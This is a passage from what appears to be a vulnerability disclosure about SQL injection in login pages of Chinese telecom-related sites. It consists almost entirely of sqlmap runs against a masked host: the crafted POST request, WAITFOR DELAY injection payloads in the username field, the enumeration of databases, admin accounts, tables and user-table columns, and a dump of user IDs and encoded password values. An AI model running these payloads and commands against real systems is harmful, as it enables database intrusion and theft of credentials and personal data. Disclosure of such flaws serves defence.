| ct_hd_335_z129_log |
| ct_hd_335_z153_jiangpin |
| ct_hd_335_z153_log |
| ct_hd_335_z153_pn |
| ct_hd_335_z153_pv |
| ct_hd_335_z159_log |
| ct_hd_335_z170_jiangpin |
| ct_hd_335_z170_log |
| ct_hd_335_z170_pn |
| ct_hd_335_z170_pv |
| ct_hd_335_z25_pinglun |
| ct_hd_335_z25_toupiao |
| ct_hd_335_z25_userlist |
| ct_hd_335_z25_userlist |
| ct_hd_335_z59_pn |
| ct_hd_335_z60_log |
| ct_hd_335_z61_log |
| ct_hd_335_z67_Admin |
| ct_hd_335_z67_Fzr |
| ct_hd_335_z67_HuoDong |
| ct_hd_335_z67_QuXian |
| ct_hd_335_z67_ShenHe |
| ct_hd_335_z67_WangDianLeiBie |
| ct_hd_335_z67_WangDianLeiBie |
| ct_hd_335_z67_XiXiang |
| ct_hd_335_z81_JiangPing |
| ct_hd_335_z81_log |
| ct_hd_335_z81_pn |
| ct_hd_335_z81_pv |
| ct_hd_DG |
| ct_hd_JiangPin_log |
| ct_hd_JiangPin_log |
| ct_hd_JiangPin_user |
| ct_hd_pv |
| ct_hd_yzm |
| ct_index_smsshow |
| ct_interface_log |
| ct_interface_smshdinterface_log |
| ct_koufeimms_sendyzm_log |
| ct_mms_DeliveryReceiptlog |
| ct_mms_sendlog |
| ct_sms_sendbytime_20141222 |
| ct_sms_sendbytime_20141222 |
| ct_sms_type |
| ct_sns_products_duihuang |
| ct_sns_products_duihuang |
| cz_3g |
| cz_lp |
| czdt |
| cztk |
| day_sms |
| department |
| diaocha |
| diymms |
| downMMS |
| errorsend |
| first_channel |
| five_festival |
| five_gc |
| fiveresult |
| foot_channel |
| friends |
| fyb |
| gjzk |
| hd_sms_code |
| hd_sms_code |
| hd_sms_fs |
| hd_sms_phone |
| hd_wap_yq |
| hd_wap_yq |
| hd_xdfs |
| hd_yg_ll |
| hdsb |
| hdsjb_1 |
| hdsjb_4 |
| hdsjb_8 |
| hdtpjl |
| hdtpjl |
| hmcc |
| hmd_hd |
| hmd_hd |
| hmd_new |
| hsyg |
| hwsms_other |
| hzhb |
| indexImage |
| khdType |
| khddppn |
| khddppn |
| khddpsms |
| khdmms |
| khdmmstype |
| khdsmsdp |
| khdsmsdp |
| khdsmsfx |
| khdsmspj |
| loginSum |
| lyImage |
| ly_ncbx |
| ly_zycp |
| lyfirst_channel |
| mm_t_image |
| mm_t_km_175 |
| mm_t_km_175 |
| mm_t_sxmessage |
| mm_t_userAnswer |
| mm_t_userBD |
| mm_t_userlist |
| mm_t_xxmessage |
| mm_t_zf |
| mmsKeyword |
| mmsManage |
| mmsReceive |
| mmsSend |
| mmsTimePhonejl |
| mms_downsend_log |
| mms_downsend_log |
| mms_msg |
| mms_sx |
| mms_type |
| mmsindeximage |
| mmsqfnr |
| mmsqfnr |
| mmstimephone_20141229 |
| mmstimephone_20141229 |
| mmstype |
| mmsxz |
| mobileXT |
| nc_goods |
| nchmd |
| ncsjb |
| nctj |
| nctsSms |
| ncxb |
| nczj |
| notice_type |
| notice_type |
| personMmsSend |
| personMmsSend |
| personSend |
| phoneCC |
| phone_select_same |
| pkddcx |
| pkqkb |
| pn1209 |
| qfDay |
| qfMmsSearch |
| qhd_sms_msg |
| qhd_sms_msg |
| qhd_smstp |
| qhdyg_0517 |
| qsMmsSearch |
| qsSmsSearch |
| qxSmsPage |
| second_channel |
| select_phone1 |
| select_phone1 |
| select_phone2 |
| select_phone3 |
| select_phone4 |
| select_phone5 |
| select_phonejl |
| sendArea |
| sendXN |
| sjbbf |
| sjbyg |
| sjz_sms |
| smsPage |
| smsSendAge |
| smsSendLike |
| smsTimePhone |
| sms_batchopen |
| sms_comment |
| sms_downsend_log |
| sms_msg |
| sms_sc |
| sms_tsnumber |
| sms_type |
| sms_web_user_exit |
| sms_web_user_exit |
| sns_day_title |
| sns_fw |
| sns_rq |
| sns_speek |
| sns_tree |
| sx_mms_bbs |
| sx_mms_bbs |
| sx_mms_files |
| sx_mms_forward |
| sx_sms |
| sysdiagrams |
| t_temp_send |
| temp_20131224 |
| temp_20131224 |
| test111 |
| testphone |
| timedsmms |
| timemms |
| timesms |
| tj |
| tsGame |
| tt |
| txl |
| userMenu |
| userQX |
| user_type |
| v_ct_hd_000_Z92_mmslog |
| v_ct_hd_000_z92_3gp |
| v_ct_hd_310_z57 |
| v_ct_hd_335_z25_userlist |
| v_ct_sms_type |
| v_yx_t_userlist |
| wb_comment |
| wb_invitation |
| wb_type |
| web_user_tj |
| weekJDJL |
| wx_t_image |
| wx_t_sxmessage |
| wx_t_userlist |
| wx_t_xxmessage |
| xb_phone |
| xf_user |
| xx_sms |
| ygPhoneMms |
| ygPhoneTable |
| yghmb |
| yx_hd_000_log |
| yx_hd_000_log |
| yx_hd_000_log |
| yx_hd_001 |
| yx_hd_002_log |
| yx_hd_002_question |
| yx_hd_003_log |
| yx_hd_DG_Z003 |
| yx_hd_DG_Z003 |
| yx_nmhb_menu |
| yx_t_audio |
| yx_t_eventlog |
| yx_t_image |
| yx_t_km_175 |
| yx_t_km_175 |
| yx_t_service |
| yx_t_sxmessage_zqbt |
| yx_t_sxmessage_zqbt |
| yx_t_userAnswer |
| yx_t_userBD |
| yx_t_userlist |
| yx_t_video |
| yx_t_xxmessage |
| yx_t_ymdx2 |
| yx_t_ymdx2 |
| yx_t_zf |
| yx_wx_dglog |
| zjnum |
| zzcprt |
+----------------------------------+
[17:56:28] [INFO] fetched data logged to text files under 'C:\Documents and Settings\Administrator\.sqlmap\output\**.**.**.**'
[*] shutting down at 17:56:28
这个是SA
这个站点卡的要死。

漏洞证明:

接下来是赣州的:
**.**.**.**/
登录接口存在延时注入。
as.txt :
POST /Index.aspx HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: **.**.**.**/Index.aspx
Cookie: ASP.NET_SessionId=1j1yopzij4k4uhis53rtinsx
X-Forwarded-For: **.**.**.**'
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 314
__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTE5OTkwMzcxMjlkZB9LtTvlJuH9lC52fLQheLHt%2FwuyD2mOOVy9my3gcPyC&__VIEWSTATEGENERATOR=90059987&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=%2FwEWBAKE0uepBwKvpuq2CAKExp2FBwKMlLHiBA9ubrZnTcRpYXQkjS7WFFxgUH5Zt9NXJ5zPJ7O2EiNj&username=123&userpwd=123&Login_but=%E7%99%BB%E5%BD%95
sqlmap.py -r as.txt --dbs
E:\qy\sqlmapproject-sqlmap-b1d13d1>sqlmap.py -r as.txt --dbs
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150213}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 12:20:50
as.txt
[12:20:50] [INFO] parsing HTTP request from 'as.txt'
as.txt
[12:20:50] [WARNING] provided value for parameter '__LASTFOCUS' is empty. Please
, always use only valid parameter values so sqlmap could be able to run properly
[12:20:50] [WARNING] provided value for parameter '__EVENTTARGET' is empty. Plea
se, always use only valid parameter values so sqlmap could be able to run proper
ly
[12:20:50] [WARNING] provided value for parameter '__EVENTARGUMENT' is empty. Pl
ease, always use only valid parameter values so sqlmap could be able to run prop
erly
[12:20:50] [INFO] resuming back-end DBMS 'microsoft sql server'
[12:20:50] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: username (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE5OTkwMzcxMjlkZB9LtTvlJuH9lC52fL
QheLHt/wuyD2mOOVy9my3gcPyC&__VIEWSTATEGENERATOR=90059987&__EVENTTARGET=&__EVENTA
RGUMENT=&__EVENTVALIDATION=/wEWBAKE0uepBwKvpuq2CAKExp2FBwKMlLHiBA9ubrZnTcRpYXQkj
S7WFFxgUH5Zt9NXJ5zPJ7O2EiNj&username=123'; WAITFOR DELAY '0:0:5'--&userpwd=123&L
ogin_but=%E7%99%BB%E5%BD%95
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE5OTkwMzcxMjlkZB9LtTvlJuH9lC52fL
QheLHt/wuyD2mOOVy9my3gcPyC&__VIEWSTATEGENERATOR=90059987&__EVENTTARGET=&__EVENTA
RGUMENT=&__EVENTVALIDATION=/wEWBAKE0uepBwKvpuq2CAKExp2FBwKMlLHiBA9ubrZnTcRpYXQkj
S7WFFxgUH5Zt9NXJ5zPJ7O2EiNj&username=123' WAITFOR DELAY '0:0:5'--&userpwd=123&Lo
gin_but=%E7%99%BB%E5%BD%95
---
[12:20:50] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
[12:20:50] [INFO] fetching database names
[12:20:50] [INFO] fetching number of databases
[12:20:50] [WARNING] time-based comparison requires larger statistical model, pl
ease wait..............................
[12:20:54] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n]
1
[13:56:02] [INFO] adjusting time delay to 1 second due to good response times
0
[13:56:02] [INFO] retrieved: distribution
[13:57:01] [INFO] retrieved: JXtele
[13:57:32] [INFO] retrieved: JXwzgl
[13:58:05] [INFO] retrieved: master
[13:58:33] [INFO] retrieved: model
[13:58:59] [INFO] retrieved: msd
[13:59:33] [ERROR] invalid character detected. retrying..
[13:59:33] [WARNING] increasing time delay to 2 seconds
[13:59:59] [ERROR] invalid character detected. retrying..
[13:59:59] [WARNING] increasing time delay to 3 seconds
[14:00:04] [ERROR] invalid character detected. retrying..
[14:00:04] [WARNING] increasing time delay to 4 seconds
[14:00:10] [ERROR] invalid character detected. retrying..
[14:00:10] [WARNING] increasing time delay to 5 seconds
[14:00:17] [ERROR] invalid character detected. retrying..
[14:00:17] [WARNING] increasing time delay to 6 seconds
[14:00:25] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://**.**.**.**/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[14:00:25] [ERROR] unable to properly validate last character value ('?')..
?
[14:00:25] [INFO] retrieved: Northwind
[14:01:14] [INFO] retrieved: pubs
[14:01:36] [INFO] retrieved: tempdb
[14:02:07] [INFO] retrieved: test_Oracle
available databases [10]:
[*] distribution
[*] JXtele
[*] JXwzgl
[*] master
[*] model
[*] msd?
[*] Northwind
[*] pubs
[*] tempdb
[*] test_Oracle
[14:03:01] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 14:03:01
E:\qy\sqlmapproject-sqlmap-b1d13d1>sqlmap.py -r as.txt --privileges
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150213}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 12:09:08
as.txt
[12:09:08] [INFO] parsing HTTP request from 'as.txt'
as.txt
[12:09:08] [WARNING] provided value for parameter '__LASTFOCUS' is empty. Please
, always use only valid parameter values so sqlmap could be able to run properly
[12:09:08] [WARNING] provided value for parameter '__EVENTTARGET' is empty. Plea
se, always use only valid parameter values so sqlmap could be able to run proper
ly
[12:09:08] [WARNING] provided value for parameter '__EVENTARGUMENT' is empty. Pl
ease, always use only valid parameter values so sqlmap could be able to run prop
erly
[12:09:08] [INFO] resuming back-end DBMS 'microsoft sql server'
[12:09:08] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: username (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE5OTkwMzcxMjlkZB9LtTvlJuH9lC52fL
QheLHt/wuyD2mOOVy9my3gcPyC&__VIEWSTATEGENERATOR=90059987&__EVENTTARGET=&__EVENTA
RGUMENT=&__EVENTVALIDATION=/wEWBAKE0uepBwKvpuq2CAKExp2FBwKMlLHiBA9ubrZnTcRpYXQkj
S7WFFxgUH5Zt9NXJ5zPJ7O2EiNj&username=123'; WAITFOR DELAY '0:0:5'--&userpwd=123&L
ogin_but=%E7%99%BB%E5%BD%95
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE5OTkwMzcxMjlkZB9LtTvlJuH9lC52fL
QheLHt/wuyD2mOOVy9my3gcPyC&__VIEWSTATEGENERATOR=90059987&__EVENTTARGET=&__EVENTA
RGUMENT=&__EVENTVALIDATION=/wEWBAKE0uepBwKvpuq2CAKExp2FBwKMlLHiBA9ubrZnTcRpYXQkj
S7WFFxgUH5Zt9NXJ5zPJ7O2EiNj&username=123' WAITFOR DELAY '0:0:5'--&userpwd=123&Lo
gin_but=%E7%99%BB%E5%BD%95
---
[12:09:08] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
[12:09:08] [WARNING] on Microsoft SQL Server it is not possible to fetch databas
e users privileges, sqlmap will check whether or not the database users are data
base administrators
[12:09:08] [INFO] fetching database users
[12:09:08] [INFO] fetching number of database users
[12:09:08] [WARNING] time-based comparison requires larger statistical model, pl
ease wait..............................
[12:09:12] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n]
[12:09:29] [INFO] adjusting time delay to 1 second due to good response times
3
[12:09:29] [INFO] retrieved: BUILTIN\Administrators
[12:11:08] [INFO] retrieved: distributor_admin
[12:12:36] [INFO] retrieved: sa
[12:12:44] [INFO] testing if current user is DBA
[12:12:44] [INFO] testing if current user is DBA
[12:12:45] [INFO] testing if current user is DBA
database management system users privileges:
[*] BUILTIN\\Administrators
[*] distributor_admin (administrator)
[*] sa (administrator)
[12:12:47] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 12:12:47
sqlmap.py -r as.txt -D JXtele --tables
E:\qy\sqlmapproject-sqlmap-b1d13d1>sqlmap.py -r as.txt -D JXtele --tables
Database: JXtele
[99 tables]
+--------------------------------------+
| B_Area |
| B_Dep |
| B_Error |
| B_FTTH |
| B_FTTH_Son |
| B_FTTHadsg |
| B_FTTHadsg_WWG_TEMP |
| B_FTTHadsg_son |
| B_Fibre |
| B_FibreAdsg |
| B_FibreAdsg_GC |
| B_FibreAdsg_GC_son |
| B_FibreAdsg_son |
| B_Fibre_son |
| B_File |
| B_GIS |
| B_GPS_GIS |
| B_Need |
| B_PowerUser |
| B_QCMB |
| B_ReportCentre |
| B_Suggest_son |
| B_TwoCode |
| B_User |
| B_line |
| B_suggest |
| Sheet1 |
| Sheet21 |
| Sheetaa2 |
| V_FTTHADSG_SON_For_Main |
| V_Fibre_son |
| V_GIS_YLGR |
| V_GLWZL_QD_GJJX |
| V_GLWZL_QD_GLD |
| V_GLWZL_QD_GR_FTTX |
| V_GLWZL_QD_GR_GJJX |
| V_GLWZL_QD_GR_ODF |
| V_GLWZL_QD_GR_QT |
| V_GLWZL_QD_GZDH |
| V_GLWZL_QD_OBD |
| V_GLWZL_QD_ODF |
| V_GLWZL_QD_ODFCD |
| V_GLWZL_QD_ZPX |
| V_GLWZL_Qa_GJCD |
| V_GLWZL_TJ |
| V_GPS_DWTJ |
| V_USER_POWER |
| V_user |
| B_Ftth_\\?81mg |
| V_FtthAqsg_wwg_Oraclqm!L\x12\x1b!A!# |
| V_Operate\t\r |
| v_ftthadsg_tj_p\t |
| v_ftthadsg_tj_p_d! |
| v_gi}_grly\x7fsbmm\t\x05A |
| v_gps_gis_ond?cfs9 |
| v_kshsd_2_obddwtj\x05 |
| v_kshsd_6_zwrtj\x11 |
| b_JC |
| b_JC_Img |
| b_JC_ZD |
| b_Operate |
| b_entry |
| b_ftthadsg_150422 |
| b_layer |
| b_layerLine |
| dtproperties |
| gj |
| sysconstraints |
| syssegments |
| v_fibre_qd |
| v_fibre_tj_fgc |
| v_fibre_tj_gc |
| v_fibreadsg_imgbwz |
| v_ftthadsg_area |
| v_ftthadsg_tj |
| v_ftthadsg_tj_p_d_s |
| v_ftthadsg_tj_shr |
| v_gps_dwtj_v2 |
| v_gps_gis_gmjxqdDA |
| v_gps_gis_obdqd |
| v_gps_gis_odgqd |
| v_gps_gis_yyb |
| v_gps_gis_zwrtj |
| v_gwgcys_qd |
| v_gwjc_qd |
| v_gwqc_qd |
| v_gwxjss_qd |
| v_kshsd_1_obdqd |
| v_kshsd_3_yybdwtj |
| v_kshsd_4_mbxqysqd |
| v_kshsd_5_mbxqwcl |
| v_kshsd_7agdwwcl |
| v_omg_ftthobdzy_Oracle |
| v_qsqcmb_qd |
| v_yybhx_dk |
| v_yybhx_zwr_eplan |
| v_yybhx_zwr_lan |
| v_yybhx_zwr_obd |
| v_yybhx_zwr_zg |
+--------------------------------------+
[17:48:39] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 17:48:39
E:\qy\sqlmapproject-sqlmap-b1d13d1>sqlmap.py -r as.txt -D JXtele -T B_User --col
umns
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150213}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 20:17:51
as.txt
[20:17:51] [INFO] parsing HTTP request from 'as.txt'
as.txt
[20:17:51] [WARNING] provided value for parameter '__LASTFOCUS' is empty. Please
, always use only valid parameter values so sqlmap could be able to run properly
[20:17:51] [WARNING] provided value for parameter '__EVENTTARGET' is empty. Plea
se, always use only valid parameter values so sqlmap could be able to run proper
ly
[20:17:51] [WARNING] provided value for parameter '__EVENTARGUMENT' is empty. Pl
ease, always use only valid parameter values so sqlmap could be able to run prop
erly
[20:17:51] [INFO] resuming back-end DBMS 'microsoft sql server'
[20:17:51] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: username (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE5OTkwMzcxMjlkZB9LtTvlJuH9lC52fL
QheLHt/wuyD2mOOVy9my3gcPyC&__VIEWSTATEGENERATOR=90059987&__EVENTTARGET=&__EVENTA
RGUMENT=&__EVENTVALIDATION=/wEWBAKE0uepBwKvpuq2CAKExp2FBwKMlLHiBA9ubrZnTcRpYXQkj
S7WFFxgUH5Zt9NXJ5zPJ7O2EiNj&username=123'; WAITFOR DELAY '0:0:5'--&userpwd=123&L
ogin_but=%E7%99%BB%E5%BD%95
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE5OTkwMzcxMjlkZB9LtTvlJuH9lC52fL
QheLHt/wuyD2mOOVy9my3gcPyC&__VIEWSTATEGENERATOR=90059987&__EVENTTARGET=&__EVENTA
RGUMENT=&__EVENTVALIDATION=/wEWBAKE0uepBwKvpuq2CAKExp2FBwKMlLHiBA9ubrZnTcRpYXQkj
S7WFFxgUH5Zt9NXJ5zPJ7O2EiNj&username=123' WAITFOR DELAY '0:0:5'--&userpwd=123&Lo
gin_but=%E7%99%BB%E5%BD%95
---
[20:17:51] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
[20:17:51] [INFO] fetching columns for table 'B_User' in database 'JXtele'
[20:17:51] [WARNING] time-based comparison requires larger statistical model, pl
ease wait..............................
[20:17:55] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n]
2
[20:18:19] [INFO] adjusting time delay to 1 second due to good response times
2
[20:18:21] [INFO] retrieved: address
[20:18:56] [INFO] retrieved: nvarchar
[20:19:37] [INFO] retrieved: areaGis
[20:20:08] [INFO] retrieved: nvarchar
[20:20:49] [INFO] retrieved: areaOMG
[20:21:21] [INFO] retrieved: nvarchar
[20:22:02] [INFO] retrieved: areaZD
[20:22:30] [INFO] retrieved: nvarchar
[20:23:11] [INFO] retrieved: CITY
[20:23:29] [INFO] retrieved: nvarchar
[20:24:09] [INFO] retrieved: codeNum
[20:24:47] [INFO] retrieved: nvarchar
[20:25:27] [INFO] retrieved: duty
[20:25:51] [INFO] retrieved: nvarchar
[20:26:32] [INFO] retrieved: email
[20:26:57] [INFO] retrieved: nvarchar
[20:27:38] [INFO] retrieved: gender
[20:28:11] [INFO] retrieved: nvarchar
[20:28:52] [INFO] retrieved: Job1
[20:29:11] [INFO] retrieved: nvarchar
[20:29:52] [INFO] retrieved: Job2
[20:30:13] [INFO] retrieved: nvarchar
[20:30:54] [INFO] retrieved: Job3
[20:31:15] [INFO] retrieved: nvarchar
[20:31:55] [INFO] retrieved: point
[20:32:27] [INFO] retrieved: nvarchar
[20:33:08] [INFO] retrieved: pwd
[20:33:28] [INFO] retrieved: nvarchar
[20:34:10] [INFO] retrieved: RegTime
[20:34:46] [INFO] retrieved: datetime
[20:35:26] [INFO] retrieved: remark
[20:35:56] [INFO] retrieved: nvarchar
[20:36:38] [INFO] retrieved: stopuser
[20:37:25] [INFO] retrieved: bit
[20:37:41] [INFO] retrieved: tel
[20:38:00] [INFO] retrieved: nvarchar
[20:38:42] [INFO] retrieved: usercode
[20:39:25] [INFO] retrieved: nvarchar
[20:40:06] [INFO] retrieved: userID
[20:40:37] [INFO] retrieved: int
[20:40:54] [INFO] retrieved: username
[20:41:37] [INFO] retrieved: nvarchar
[20:42:18] [INFO] retrieved: usertype
[20:43:04] [INFO] retrieved: nvarchar
Database: JXtele
Table: B_User
[22 columns]
+----------+----------+
| Column | Type |
+----------+----------+
| address | nvarchar |
| areaGis | nvarchar |
| areaOMG | nvarchar |
| areaZD | nvarchar |
| CITY | nvarchar |
| codeNum | nvarchar |
| duty | nvarchar |
| email | nvarchar |
| gender | nvarchar |
| Job1 | nvarchar |
| Job2 | nvarchar |
| Job3 | nvarchar |
| point | nvarchar |
| pwd | nvarchar |
| RegTime | datetime |
| remark | nvarchar |
| stopuser | bit |
| tel | nvarchar |
| usercode | nvarchar |
| userID | int |
| username | nvarchar |
| usertype | nvarchar |
+----------+----------+
[20:43:45] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 20:43:45
sqlmap.py -r as.txt --dump JXtele -T B_User -C "tel,pwd"
E:\qy\sqlmapproject-sqlmap-b1d13d1>sqlmap.py -r as.txt --dump JXtele -T B_User -
C "userID,username,pwd"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150213}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 20:53:21
as.txt
[20:53:21] [INFO] parsing HTTP request from 'as.txt'
as.txt
[20:53:21] [WARNING] provided value for parameter '__LASTFOCUS' is empty. Please
, always use only valid parameter values so sqlmap could be able to run properly
[20:53:21] [WARNING] provided value for parameter '__EVENTTARGET' is empty. Plea
se, always use only valid parameter values so sqlmap could be able to run proper
ly
[20:53:21] [WARNING] provided value for parameter '__EVENTARGUMENT' is empty. Pl
ease, always use only valid parameter values so sqlmap could be able to run prop
erly
[20:53:21] [INFO] resuming back-end DBMS 'microsoft sql server'
[20:53:21] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: username (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE5OTkwMzcxMjlkZB9LtTvlJuH9lC52fL
QheLHt/wuyD2mOOVy9my3gcPyC&__VIEWSTATEGENERATOR=90059987&__EVENTTARGET=&__EVENTA
RGUMENT=&__EVENTVALIDATION=/wEWBAKE0uepBwKvpuq2CAKExp2FBwKMlLHiBA9ubrZnTcRpYXQkj
S7WFFxgUH5Zt9NXJ5zPJ7O2EiNj&username=123'; WAITFOR DELAY '0:0:5'--&userpwd=123&L
ogin_but=%E7%99%BB%E5%BD%95
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE5OTkwMzcxMjlkZB9LtTvlJuH9lC52fL
QheLHt/wuyD2mOOVy9my3gcPyC&__VIEWSTATEGENERATOR=90059987&__EVENTTARGET=&__EVENTA
RGUMENT=&__EVENTVALIDATION=/wEWBAKE0uepBwKvpuq2CAKExp2FBwKMlLHiBA9ubrZnTcRpYXQkj
S7WFFxgUH5Zt9NXJ5zPJ7O2EiNj&username=123' WAITFOR DELAY '0:0:5'--&userpwd=123&Lo
gin_but=%E7%99%BB%E5%BD%95
---
[20:53:21] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
[20:53:21] [WARNING] missing database parameter. sqlmap is going to use the curr
ent database to enumerate table(s) entries
[20:53:21] [INFO] fetching current database
[20:53:21] [WARNING] time-based comparison requires larger statistical model, pl
ease wait..............................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n]
[20:53:32] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
[20:53:43] [INFO] adjusting time delay to 1 second due to good response times
JXtele
[20:54:09] [INFO] fetching columns 'pwd, userID, username' for table 'B_User' in
database 'JXtele'
[20:54:09] [INFO] retrieved: 3
[20:54:13] [INFO] retrieved:
[20:54:14] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[20:54:14] [INFO] retrieved:
[20:54:16] [INFO] retrieved:
[20:54:17] [WARNING] unable to retrieve column names for table 'B_User' in datab
ase 'JXtele'
[20:54:17] [INFO] fetching entries of column(s) 'pwd, userID, username' for tabl
e 'B_User' in database 'JXtele'
[20:54:17] [INFO] fetching number of column(s) 'pwd, userID, username' entries f
or table 'B_User' in database 'JXtele'
[20:54:17] [INFO] retrieved: 5000
[20:54:27] [INFO] fetching number of distinct values for column 'pwd'
[20:54:27] [INFO] retrieved: 82
[20:54:34] [INFO] fetching number of distinct values for column 'userID'
[20:54:34] [INFO] retrieved: 5000
[20:54:45] [INFO] using column 'userID' as a pivot for retrieving row data
[20:54:45] [INFO] retrieved: 0
[20:54:52] [INFO] retrieved: ZwsUcorZkCrsujLiL6T2vQ==
[20:56:49] [INFO] retrieved:
[20:57:17] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://**.**.**.**/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
??攷?晤??塔
[20:59:25] [INFO] retrieved: 1000
[20:59:47] [INFO] retrieved: ZwsUcorZkCrsujLiL6T2vQ==
[21:01:45] [INFO] retrieved: ﹦??
[21:03:15] [INFO] retrieved: 10000
[21:03:44] [INFO] retrieved: ZwsUcorZkCrsujLiL6T2vQ==
[21:05:41] [INFO] retrieved: ?潦瑑
[21:07:16] [INFO] retrieved: 10001
[21:07:41] [INFO] retrieved: ZwsUcorZkCrsujLiL6T2vQ==
[21:09:39] [INFO] retrieved: ?靛獞
[21:11:11] [INFO] retrieved: 10002
[21:11:38] [INFO] retrieved: ZwsUcorZkCrsujLiL6T2vQ==
[21:13:34] [INFO] retrieved: ??畑
[21:15:05] [INFO] retrieved: 10003
[21:15:31] [INFO] retrieved: ZwsUcorZkCrsujLiL6T2vQ==
[21:17:28] [INFO] retrieved: 鑞山
[21:18:30] [INFO] retrieved: 10004
[21:18:57] [INFO] retrieved: ZwsUcorZkCrsujLiL6T2vQ==
[21:20:54] [INFO] retrieved: ?疍豥
[21:22:22] [INFO] retrieved: 10005
[21:22:48] [INFO] retrieved: ZwsUcorZkCrsujLiL6T2vQ==
[21:24:45] [INFO] retrieved: ??彬
[21:26:23] [INFO] retrieved: 10006
